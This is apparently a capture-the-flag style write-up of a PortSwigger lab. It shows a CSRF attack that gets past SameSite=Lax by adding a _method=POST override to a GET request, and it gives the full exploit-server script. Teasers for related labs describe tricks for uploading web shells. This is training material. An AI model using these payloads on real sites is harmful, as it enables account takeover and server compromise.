On this page
SameSite Lax Bypass via Method Override
Lab
SameSite Lax bypass via method override · Practitioner
Solution
Given: we want to change the user's password using a CSRF attack, bypassing the SameSite restriction via method override. In this case SameSite=Lax, which means the cookie will only be sent on GET top-level navigation requests — that is, when the URL changes in the browser's address bar.
We find the request and see: a POST request with 1 parameter in the body — email.
OK, let's try simply swapping POST for GET — Method not allowed. Let's try the classic — the _method query param:
GET /my-account/change-email?email=xui1@p.ru&_method=POST HTTP/2
That payload goes through.
What do we host on the exploit server?
<script>
location = 'https://0a6b0055046e423e8141849f004500f8.web-security-academy.net/my-account/change-email?email=hacked@p.ru&_method=POST'
</script>
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.